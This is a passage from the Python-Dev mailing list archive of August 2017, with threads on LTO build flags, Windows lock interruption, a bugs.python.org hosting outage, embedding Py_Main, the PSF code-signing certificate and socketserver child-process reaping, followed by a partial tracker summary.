09:52:52 +0200 Subject: [Python-Dev] first post introduction and question regarding lto References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: <20170809095252.3340cd7b@fsol> On Wed, 9 Aug 2017 13:36:28 +1000 Nick Coghlan wrote: > On 8 August 2017 at 10:12, Gregory P. Smith wrote: > > I don't know whether it is beneficial or not - but having the capability to > > build LTO without PGO seems reasonable. I can review any pull requests > > altering configure.ac and Makefile.pre.in to make such a change. > > Being able to separate them seems useful even if it's just from the > performance research perspective of comparing "PGO only", "LTO only" > and "PGO+LTO". That does not mean "LTO only" deserves a configure option, though. PGO is difficult to set up manually so it's fair that we provide dedicated build support for it. LTO should just be a matter of tweaking CFLAGS and LDFLAGS. Regards Antoine. From solipsis at pitrou.net Wed Aug 9 03:58:30 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 9 Aug 2017 09:58:30 +0200 Subject: [Python-Dev] Interrupt thread.join() with Ctrl-C / KeyboardInterrupt on Windows References: Message-ID: <20170809095830.0ec5f712@fsol> On Tue, 8 Aug 2017 14:29:41 -0700 Steve Dower wrote: > On 08Aug2017 1151, Nathaniel Smith wrote: > > It looks like Thread.join ultimately ends up blocking in > > Python/thread_nt.h:EnterNonRecursiveMutex, which has a maze of #ifdefs > > behind it -- I think there are 3 different implementation you might > > end up with, depending on how CPython was built? Two of them seem to > > ultimately block in WaitForSingleObject, which would be easy to adapt > > to handle control-C. 
Unfortunately I think the implementation that > > actually gets used on modern systems is the one that blocks in > > SleepConditionVariableSRW, and I don't see any easy way for a > > control-C to interrupt that. But maybe I'm missing something -- I'm > > not a Windows expert. > > I'd have to dig back through the recent attempts at changing this, but I > believe the SleepConditionVariableSRW path is unused for all versions of > Windows. > > A couple of people (including myself) attempted to enable that code > path, but it has some subtle issues that were causing test failures, so > we abandoned all the attempts. Though ISTR that someone put in more > effort than most of us, but I don't think we've merged it (and if we > have, it'd only be in 3.7 at this stage). For the record, there are issues open for this: - locks not interruptible on Windows: https://bugs.python.org/issue29971 - enable optimized locks on Windows: https://bugs.python.org/issue29871 Having Lock.acquire() be interruptible would be really nice as it's the basis for so many of our synchronization primitives (including Thread.join(), I believe). Regards Antoine. From victor.stinner at gmail.com Wed Aug 9 05:16:36 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Wed, 9 Aug 2017 11:16:36 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <20170809095252.3340cd7b@fsol> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> Message-ID: There is already a ./configure --with-lto flag, why not using it? I'm using --with-lto without PGO for months, I never noticed that the option is fully ignored! Victor 2017-08-09 9:52 GMT+02:00 Antoine Pitrou : > On Wed, 9 Aug 2017 13:36:28 +1000 > Nick Coghlan wrote: >> On 8 August 2017 at 10:12, Gregory P. Smith wrote: >> > I don't know whether it is beneficial or not - but having the capability to >> > build LTO without PGO seems reasonable. I can review any pull requests >> > altering configure.ac and Makefile.pre.in to make such a change. >> >> Being able to separate them seems useful even if it's just from the >> performance research perspective of comparing "PGO only", "LTO only" >> and "PGO+LTO". > > That does not mean "LTO only" deserves a configure option, though. PGO > is difficult to set up manually so it's fair that we provide dedicated > build support for it. LTO should just be a matter of tweaking CFLAGS > and LDFLAGS. > > Regards > > Antoine. 
> > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com From solipsis at pitrou.net Wed Aug 9 05:22:22 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 9 Aug 2017 11:22:22 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> Message-ID: <20170809112222.4d59a0f8@fsol> On Wed, 9 Aug 2017 11:16:36 +0200 Victor Stinner wrote: > There is already a ./configure --with-lto flag, why not using it? > > I'm using --with-lto without PGO for months, I never noticed that the > option is fully ignored! What are the reasons it is ignored? IIRC some compilers have buggy LTO support and it can lead to crashes during compilation. Regards Antoine. From victor.stinner at gmail.com Wed Aug 9 05:52:45 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Wed, 9 Aug 2017 11:52:45 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <20170809112222.4d59a0f8@fsol> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> <20170809112222.4d59a0f8@fsol> Message-ID: 2017-08-09 11:22 GMT+02:00 Antoine Pitrou : > What are the reasons it is ignored? IIRC some compilers have buggy LTO > support and it can lead to crashes during compilation. Issues with LTO: http://bugs.python.org/issue28032 http://bugs.python.org/issue28605 But since --with-lto is now an opt-in option, I don't why it should ignored when PGO is not used? Victor From ncoghlan at gmail.com Wed Aug 9 09:06:41 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 9 Aug 2017 23:06:41 +1000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <20170809095252.3340cd7b@fsol> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> Message-ID: On 9 August 2017 at 17:52, Antoine Pitrou wrote: > On Wed, 9 Aug 2017 13:36:28 +1000 > Nick Coghlan wrote: >> On 8 August 2017 at 10:12, Gregory P. Smith wrote: >> > I don't know whether it is beneficial or not - but having the capability to >> > build LTO without PGO seems reasonable. I can review any pull requests >> > altering configure.ac and Makefile.pre.in to make such a change. >> >> Being able to separate them seems useful even if it's just from the >> performance research perspective of comparing "PGO only", "LTO only" >> and "PGO+LTO". > > That does not mean "LTO only" deserves a configure option, though. PGO > is difficult to set up manually so it's fair that we provide dedicated > build support for it. 
LTO should just be a matter of tweaking CFLAGS > and LDFLAGS. I wouldn't be confident in my own ability to get those right for gcc, let alone getting them right for clang as well. Whereas if the "--with-lto" configure option just works, then I'd never need to worry about it :) It also means that if folks *do* investigate this, it eliminates a class of configuration bugs (i.e. "you didn't actually enable LTO correctly in your testing"). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From tjreedy at udel.edu Wed Aug 9 18:14:30 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Wed, 9 Aug 2017 18:14:30 -0400 Subject: [Python-Dev] bugs.python.org appears down Message-ID: And not just for me, for last couple of hours. http://downforeveryoneorjustme.com/bugs.python.org --- Terry Jan Reedy From mmangoba at python.org Wed Aug 9 18:18:37 2017 From: mmangoba at python.org (Mark Mangoba) Date: Wed, 9 Aug 2017 15:18:37 -0700 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST Message-ID: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> Dear Colleagues, I was just informed from our hosting provider for bugs.python.org , Hetzner Online - that the server is currently being migrated to a new data center. Unfortunately I was not informed ahead of time and working with the provider to better communicate and schedule future maintenance periods accordingly. Apologies for any inconvenience this has caused. I will be posting status updates at https://status.python.org/ . As many of you know, we are working to migrate this off the current hosting provider in the next 3 months. Best regards, Mark Mark Mangoba | PSF IT Manager | Python Software Foundation | mmangoba at python.org | python.org | Infrastructure Staff: infrastructure-staff at python.org | GPG: 2DE4 D92B 739C 649B EBB8 CCF6 DC05 E024 5F4C A0D1 -------------- next part -------------- An HTML attachment was scrubbed... URL: From python at mrabarnett.plus.com Wed Aug 9 19:12:12 2017 From: python at mrabarnett.plus.com (MRAB) Date: Thu, 10 Aug 2017 00:12:12 +0100 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> Message-ID: <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> On 2017-08-09 23:18, Mark Mangoba wrote: > Dear Colleagues, > > I was just informed from our hosting provider for bugs.python.org > , Hetzner Online - that the server is currently > being migrated to a new data center. > > Unfortunately I was not informed ahead of time and working with the > provider to better communicate and schedule future maintenance periods > accordingly. > > Apologies for any inconvenience this has caused. I will be posting > status updates at https://status.python.org/. > > As many of you know, we are working to migrate this off the current > hosting provider in the next 3 months. > Please could you use a date/time format that's more international, such as ISO 8601. 
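For what it's worth, producing such a timestamp takes one call in the standard library; a minimal sketch (the outage time shown is only an example):

from datetime import datetime, timezone

# An ISO 8601 timestamp with an explicit UTC offset avoids the
# ambiguity of a format like "08/09/17 8:00pm PST".
start = datetime(2017, 8, 10, 4, 0, tzinfo=timezone.utc)
print(start.isoformat(sep=' '))  # 2017-08-10 04:00:00+00:00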
From tjreedy at udel.edu Wed Aug 9 20:24:09 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Wed, 9 Aug 2017 20:24:09 -0400 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On 8/9/2017 7:12 PM, MRAB wrote: > On 2017-08-09 23:18, Mark Mangoba wrote: >> Dear Colleagues, >> >> I was just informed from our hosting provider for bugs.python.org >> , Hetzner Online - that the server is >> currently being migrated to a new data center. >> >> Unfortunately I was not informed ahead of time and working with the >> provider to better communicate and schedule future maintenance periods >> accordingly. >> >> Apologies for any inconvenience this has caused. I will be posting >> status updates at https://status.python.org/. >> >> As many of you know, we are working to migrate this off the current >> hosting provider in the next 3 months. >> > Please could you use a date/time format that's more international, such > as ISO 8601. I presume that would be something like 2017-08-10 04:00:00 UTC. -- Terry Jan Reedy From tjreedy at udel.edu Thu Aug 10 02:19:16 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Thu, 10 Aug 2017 02:19:16 -0400 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On 8/9/2017 8:24 PM, Terry Reedy wrote: > On 8/9/2017 7:12 PM, MRAB wrote: >> On 2017-08-09 23:18, Mark Mangoba wrote: >>> Dear Colleagues, >>> >>> I was just informed from our hosting provider for bugs.python.org >>> , Hetzner Online - that the server is >>> currently being migrated to a new data center. >>> >>> Unfortunately I was not informed ahead of time and working with the >>> provider to better communicate and schedule future maintenance >>> periods accordingly. >>> >>> Apologies for any inconvenience this has caused. I will be posting >>> status updates at https://status.python.org/. >>> >>> As many of you know, we are working to migrate this off the current >>> hosting provider in the next 3 months. >>> >> Please could you use a date/time format that's more international, >> such as ISO 8601. > > I presume that would be something like 2017-08-10 04:00:00 UTC. Fetching pages came back, but updating issues is spotty. Some work, but for others "an error has occurred" even with multiple tries. -- Terry Jan Reedy From patrick.rutkowski at gmail.com Thu Aug 10 02:26:23 2017 From: patrick.rutkowski at gmail.com (Patrick Rutkowski) Date: Thu, 10 Aug 2017 02:26:23 -0400 Subject: [Python-Dev] Py_Main() seems to be a NOOP Message-ID: I'm working on Windows with Python 3.6. I'm trying to make a wWinMain() GUI application that uses an embedded python interpreter. I'm having various issues with being unable to load extension modules, but I won't go into that now because I've tracked my issue down to a much simpler test case. To begin, consider the source code of pythonw.exe: /* Minimal main program -- everything is loaded from the library. 
*/ #include "Python.h" #define WIN32_LEAN_AND_MEAN #include int WINAPI wWinMain( HINSTANCE hInstance, /* handle to current instance */ HINSTANCE hPrevInstance, /* handle to previous instance */ LPWSTR lpCmdLine, /* pointer to command line */ int nCmdShow /* show state of window */ ) { return Py_Main(__argc, __wargv); } Now consider a simple python script, which I save in source.py f = open('C:\\Users\\rutski\\Desktop\\hello.txt', 'w') f.write('Hello World!\n') f.flush() f.close() and run with > pythonw.exe source.py This produces the file `hello.txt` with the expected output. Now I create a new Visual Studio solution. I make it Win32 project, choose "Windows Application" and "Empty Project." I create a new source file main.c and I copy-paste the source code of from pythonw (with Py_Main and all that). Now I add the following settings: C:\Users\rutski\Documents\python\PCbuild\amd64 --- Library Search Directory C:\Users\rutski\Documents\python\Include --- Include Directory C:\Users\rutski\Documents\python\PC --- Include Directory (for pyconfig.h) I choose "Debug | x64" and hit build. I pop open cmd.exe, browse to where mything.exe is, and execute > mything.exe source.py But this time nothing happens. No hello.txt gets created. I get no crash window or error message. I do not get thrown into a debugger. I just get no result. Am I missing some build flags here or something? I'm running the __exact__ same C code that pythonw.exe is, but mine isn't working. What gives? I can't even seem to get Py_Main() to execute some python code from within my own application, so trying to write my own embed code is basically hopeless. If anybody could shed any light on this it would be much appreciated! -Patrick From patrick.rutkowski at gmail.com Thu Aug 10 03:26:25 2017 From: patrick.rutkowski at gmail.com (Patrick Rutkowski) Date: Thu, 10 Aug 2017 03:26:25 -0400 Subject: [Python-Dev] Py_Main() seems to be a NOOP In-Reply-To: References: Message-ID: On Thu, Aug 10, 2017 at 2:26 AM, Patrick Rutkowski wrote: > I'm working on Windows with Python 3.6. I'm trying to make a wWinMain() GUI > application that uses an embedded python interpreter. I'm having various > issues with being unable to load extension modules, but I won't go into that > now because I've tracked my issue down to a much simpler test case. > > To begin, consider the source code of pythonw.exe... Follow up. Filed a bug in the python issue tracker: https://mail.google.com/mail/u/0/#inbox/15dcb0731f605c44 From tjreedy at udel.edu Thu Aug 10 06:27:08 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Thu, 10 Aug 2017 06:27:08 -0400 Subject: [Python-Dev] Py_Main() seems to be a NOOP In-Reply-To: References: Message-ID: On 8/10/2017 3:26 AM, Patrick Rutkowski wrote: > On Thu, Aug 10, 2017 at 2:26 AM, Patrick Rutkowski > wrote: >> I'm working on Windows with Python 3.6. I'm trying to make a wWinMain() GUI >> application that uses an embedded python interpreter. I'm having various >> issues with being unable to load extension modules, but I won't go into that >> now because I've tracked my issue down to a much simpler test case. >> >> To begin, consider the source code of pythonw.exe... > > Follow up. Filed a bug in the python issue tracker: > https://mail.google.com/mail/u/0/#inbox/15dcb0731f605c44 This returns a solicitation for gmail. Try https://bugs.python.org/issue31172 instead. 
-- Terry Jan Reedy From berker.peksag at gmail.com Thu Aug 10 09:44:15 2017 From: berker.peksag at gmail.com (=?UTF-8?Q?Berker_Peksa=C4=9F?=) Date: Thu, 10 Aug 2017 16:44:15 +0300 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On Thu, Aug 10, 2017 at 9:19 AM, Terry Reedy wrote: > Fetching pages came back, but updating issues is spotty. Some work, but for > others "an error has occurred" even with multiple tries. And I can't login to my account. When I tried to login via Google OpenID, I got "There is already an account for myemail at address.com". I also tried to reset my password and I got "Invalid login" when I tried to login with my new password. --Berker From steve.dower at python.org Thu Aug 10 11:51:15 2017 From: steve.dower at python.org (Steve Dower) Date: Thu, 10 Aug 2017 08:51:15 -0700 Subject: [Python-Dev] Python's Windows code-signing certificate Message-ID: <8c9bb216-ec7b-8391-9b5e-330a81a8c7f4@python.org> Just a heads-up, primarily for Marc-Andre, but letting everyone know for awareness. Next time we need to renew the PSF code signing certificate used for Windows releases, we will need to use a different CA. Our current certificate is from StartCom, who are losing their status as a trusted CA on Windows, which means any of their certificates issued after the 26th of September this year will be treated as invalid: https://blogs.technet.microsoft.com/mmpc/2017/08/08/microsoft-to-remove-wosign-and-startcom-certificates-in-windows-10/ The certificate we have right now is valid through February 2019, so there's no urgency to change (unless we want to avoid the risk of "accidental certificate revocation", which is one of the reasons Microsoft has lost trust in StartCom). Because the revocation of the root CA has a start date, all of our current releases and future releases with the current certificate will be fine. Since this will likely harm StartCom's business, it's very likely that they will get their act together and by the time we come to renew they'll be acceptable again. But we probably do want to be planning ahead to switch CA regardless. And for our macOS and Linux friends who may be uncertain what I'm referring to: this is the certificate embedded in the installer and every executable binary in our Windows distributions. It has nothing to do with GPG or the signature files you can download from python.org (these are still associated with my personal and completely unverified key, which is fine since nobody on Windows actually cares about GPG :) ). Cheers, Steve From berker.peksag at gmail.com Thu Aug 10 12:06:44 2017 From: berker.peksag at gmail.com (=?UTF-8?Q?Berker_Peksa=C4=9F?=) Date: Thu, 10 Aug 2017 19:06:44 +0300 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On Thu, Aug 10, 2017 at 4:44 PM, Berker Peksa? wrote: > On Thu, Aug 10, 2017 at 9:19 AM, Terry Reedy wrote: >> Fetching pages came back, but updating issues is spotty. Some work, but for >> others "an error has occurred" even with multiple tries. > > And I can't login to my account. When I tried to login via Google > OpenID, I got "There is already an account for myemail at address.com". 
I > also tried to reset my password and I got "Invalid login" when I tried > to login with my new password. Just an FYI: I'm now able to login to my account. Thank you everyone who worked on migrating bugs.p.o! --Berker From victor.stinner at gmail.com Fri Aug 11 09:44:49 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Fri, 11 Aug 2017 15:44:49 +0200 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes Message-ID: Hi, I'm working on reducing the failure rate of Python CIs (Travis CI, AppVeyor, buildbots). For that, I'm trying to reduce test side effects using "environment altered" warnings. This week, I worked on support.reap_children() which detects leaked child processes (usually created with os.fork()). I found a bug in the socketserver module: it waits for child processes completion, but only in non-blocking mode. If a child process takes too long, the server will never reads its exit status and so the server leaks "zombie processes". Leaking processes can increase the memory usage, spawning new processes can fail, etc. => http://bugs.python.org/issue31151 I changed the code to call waitpid() in blocking mode on each child process on server_close(), to ensure that all children completed when on server close: https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 After pushing my change, I'm not sure anymore if it's a good idea. There is a risk that server_close() blocks if a child is stuck on a socket recv() or send() for some reasons. Should we relax the code by waiting a few seconds (problem: hardcoded timeouts are always a bad idea), or *terminate* processes (SIGKILL on UNIX) if they don't complete fast enough? I don't know which applications use socketserver. How I can test if it breaks code in the wild? At least, I didn't notice any regression on Python CIs. Well, maybe the change is ok for the master branch. But I would like your opinion because now I would like to backport the fix to 2.7 and 3.6 branches. It might break some applications. If we *cannot* backport such change to 2.7 and 3.6 because it changes the behaviour, I will fix the bug in test_socketserver.py instead. What do you think? Victor From matt at vazor.com Fri Aug 11 11:22:17 2017 From: matt at vazor.com (Matt Billenstein) Date: Fri, 11 Aug 2017 15:22:17 +0000 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: <0101015dd1e38bdb-d2b1632f-623a-43e0-adfe-0c90278c838f-000000@us-west-2.amazonses.com> Common pattern I've used is to wait a bit, then send a kill signal. M -- Matt Billenstein matt at vazor.com Sent from my iPhone 6 (this put here so you know I have one) > On Aug 11, 2017, at 5:44 AM, Victor Stinner wrote: > > Hi, > > I'm working on reducing the failure rate of Python CIs (Travis CI, > AppVeyor, buildbots). For that, I'm trying to reduce test side effects > using "environment altered" warnings. This week, I worked on > support.reap_children() which detects leaked child processes (usually > created with os.fork()). > > I found a bug in the socketserver module: it waits for child processes > completion, but only in non-blocking mode. If a child process takes > too long, the server will never reads its exit status and so the > server leaks "zombie processes". Leaking processes can increase the > memory usage, spawning new processes can fail, etc. 
> > => http://bugs.python.org/issue31151 > > I changed the code to call waitpid() in blocking mode on each child > process on server_close(), to ensure that all children completed when > on server close: > > https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 > > After pushing my change, I'm not sure anymore if it's a good idea. > There is a risk that server_close() blocks if a child is stuck on a > socket recv() or send() for some reasons. > > Should we relax the code by waiting a few seconds (problem: hardcoded > timeouts are always a bad idea), or *terminate* processes (SIGKILL on > UNIX) if they don't complete fast enough? > > I don't know which applications use socketserver. How I can test if it > breaks code in the wild? > > At least, I didn't notice any regression on Python CIs. > > Well, maybe the change is ok for the master branch. But I would like > your opinion because now I would like to backport the fix to 2.7 and > 3.6 branches. It might break some applications. > > If we *cannot* backport such change to 2.7 and 3.6 because it changes > the behaviour, I will fix the bug in test_socketserver.py instead. > > What do you think? > > Victor > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/matt%40vazor.com From status at bugs.python.org Fri Aug 11 12:09:20 2017 From: status at bugs.python.org (Python tracker) Date: Fri, 11 Aug 2017 18:09:20 +0200 (CEST) Subject: [Python-Dev] Summary of Python tracker Issues Message-ID: <20170811160920.9AFE7565B0@psf.upfronthosting.co.za> ACTIVITY SUMMARY (2017-08-04 - 2017-08-11) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. 
Issues counts and deltas: open 6116 (+16) closed 36820 (+46) total 42936 (+62) Open issues with patches: 2341 Issues opened (42) ================== #30855: [2.7] test_tk: test_use() of test_tkinter.test_widgets randoml http://bugs.python.org/issue30855 reopened by haypo #31122: SSLContext.wrap_socket() throws OSError with errno == 0 http://bugs.python.org/issue31122 opened by nikratio #31123: fnmatch does not follow Unix fnmatch functionality http://bugs.python.org/issue31123 opened by Varun Agrawal #31128: Allow pydoc to run with an arbitrary hostname http://bugs.python.org/issue31128 opened by feanil #31129: RawConfigParser.items() is unusual in taking arguments http://bugs.python.org/issue31129 opened by odd_bloke #31131: asyncio.wait_for() TimeoutError doesn't provide full traceback http://bugs.python.org/issue31131 opened by chris.jerdonek #31132: test_prlimit from test_resource fails when building python3 in http://bugs.python.org/issue31132 opened by cstratak #31137: Add a path attribute to NamedTemporaryFile http://bugs.python.org/issue31137 opened by wsanchez #31139: Improve tracemalloc demo code in docs http://bugs.python.org/issue31139 opened by louielu #31140: Insufficient error message with incorrect formated string lite http://bugs.python.org/issue31140 opened by chris.259263 #31141: Start should be a keyword argument of the built-in sum http://bugs.python.org/issue31141 opened by Mark.Bell #31142: python shell crashed while input quotes in print() http://bugs.python.org/issue31142 opened by py78py90py #31143: lib2to3 requires source files for fixes http://bugs.python.org/issue31143 opened by tschiller #31144: add initializer to concurrent.futures.ProcessPoolExecutor http://bugs.python.org/issue31144 opened by nvdv #31145: PriorityQueue.put() fails with TypeError if priority_number in http://bugs.python.org/issue31145 opened by Miko??aj Babiak #31146: Docs: On non-public translations, language picker fallback to http://bugs.python.org/issue31146 opened by mdk #31147: a mostly useless check in list_extend() http://bugs.python.org/issue31147 opened by Oren Milman #31149: Add Japanese to the language switcher http://bugs.python.org/issue31149 opened by mdk #31151: test_socketserver: Warning -- reap_children() reaped child pro http://bugs.python.org/issue31151 opened by haypo #31153: Update docstrings of itertools functions http://bugs.python.org/issue31153 opened by serhiy.storchaka #31155: Encode set, frozenset, bytearray, and iterators as json arrays http://bugs.python.org/issue31155 opened by javenoneal #31158: test_pty: test_basic() fails randomly on Travis CI http://bugs.python.org/issue31158 opened by haypo #31159: Doc: Language switch can't switch on specific cases http://bugs.python.org/issue31159 opened by mdk #31161: Only check for print and exec parentheses cases for SyntaxErro http://bugs.python.org/issue31161 opened by mjpieters #31162: urllib.request.urlopen error http://bugs.python.org/issue31162 opened by chua.chewbock at gmail.com #31163: Return destination path in Path.rename and Path.replace http://bugs.python.org/issue31163 opened by albertogomcas #31164: test_functools: test_recursive_pickle() stack overflow on x86 http://bugs.python.org/issue31164 opened by haypo #31165: null pointer deref and segfault in list_slice (listobject.c:45 http://bugs.python.org/issue31165 opened by geeknik #31166: null pointer deref and segfault in _PyObject_Alloc (obmalloc.c http://bugs.python.org/issue31166 opened by geeknik #31169: Unknown-source assertion failure in 
multiprocessing/managers.p http://bugs.python.org/issue31169 opened by drallensmith #31171: multiprocessing.BoundedSemaphore of 32-bit python could not wo http://bugs.python.org/issue31171 opened by hongxu #31172: Py_Main() is totally broken on Visual Studio 2017 http://bugs.python.org/issue31172 opened by rutski #31174: test_tools leaks randomly references on x86 Gentoo Refleaks 3. http://bugs.python.org/issue31174 opened by haypo #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 opened by zyxtarmo #31176: Is a UDP transport also a ReadTransport/WriteTransport? http://bugs.python.org/issue31176 opened by twisteroid ambassador #31177: unittest mock's reset_mock throws an error when an attribute h http://bugs.python.org/issue31177 opened by hmvp #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 opened by haypo #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 opened by yselivanov #31180: test_multiprocessing_spawn hangs randomly on x86 Windows7 3.6 http://bugs.python.org/issue31180 opened by haypo #31181: Segfault in gcmodule.c:360 visit_decref (PyObject_IS_GC(op)) http://bugs.python.org/issue31181 opened by lchin #31182: Suggested Enhancements to zipfile & tarfile command line inter http://bugs.python.org/issue31182 opened by Steve Barnes #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 opened by George Collins Most recent 15 issues with no replies (15) ========================================== #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 #31182: Suggested Enhancements to zipfile & tarfile command line inter http://bugs.python.org/issue31182 #31181: Segfault in gcmodule.c:360 visit_decref (PyObject_IS_GC(op)) http://bugs.python.org/issue31181 #31180: test_multiprocessing_spawn hangs randomly on x86 Windows7 3.6 http://bugs.python.org/issue31180 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31177: unittest mock's reset_mock throws an error when an attribute h http://bugs.python.org/issue31177 #31176: Is a UDP transport also a ReadTransport/WriteTransport? http://bugs.python.org/issue31176 #31174: test_tools leaks randomly references on x86 Gentoo Refleaks 3. http://bugs.python.org/issue31174 #31165: null pointer deref and segfault in list_slice (listobject.c:45 http://bugs.python.org/issue31165 #31164: test_functools: test_recursive_pickle() stack overflow on x86 http://bugs.python.org/issue31164 #31155: Encode set, frozenset, bytearray, and iterators as json arrays http://bugs.python.org/issue31155 #31153: Update docstrings of itertools functions http://bugs.python.org/issue31153 #31146: Docs: On non-public translations, language picker fallback to http://bugs.python.org/issue31146 #31144: add initializer to concurrent.futures.ProcessPoolExecutor http://bugs.python.org/issue31144 #31139: Improve tracemalloc demo code in docs http://bugs.python.org/issue31139 Most recent 15 issues waiting for review (15) ============================================= #31179: Speed-up dict.copy() up to 5.5 times. 
http://bugs.python.org/issue31179 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 #31169: Unknown-source assertion failure in multiprocessing/managers.p http://bugs.python.org/issue31169 #31151: test_socketserver: Warning -- reap_children() reaped child pro http://bugs.python.org/issue31151 #31120: [2.7] Python 64 bit _ssl compile fails due missing buildinf_am http://bugs.python.org/issue31120 #31113: Stack overflow with large program http://bugs.python.org/issue31113 #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 #31046: ensurepip does not honour the value of $(prefix) http://bugs.python.org/issue31046 #31021: Clarify programming faq. http://bugs.python.org/issue31021 #31020: Add support for custom compressor in tarfile http://bugs.python.org/issue31020 #31015: PyErr_WriteUnraisable should be more verbose in Python 2.7 http://bugs.python.org/issue31015 #31013: gcc7 throws warning when pymem.h development header is used http://bugs.python.org/issue31013 #30950: Convert round() to Arument Clinic http://bugs.python.org/issue30950 Top 10 most discussed issues (10) ================================= #31113: Stack overflow with large program http://bugs.python.org/issue31113 12 msgs #31166: null pointer deref and segfault in _PyObject_Alloc (obmalloc.c http://bugs.python.org/issue31166 8 msgs #31169: Unknown-source assertion failure in multiprocessing/managers.p http://bugs.python.org/issue31169 8 msgs #22635: subprocess.getstatusoutput changed behavior in 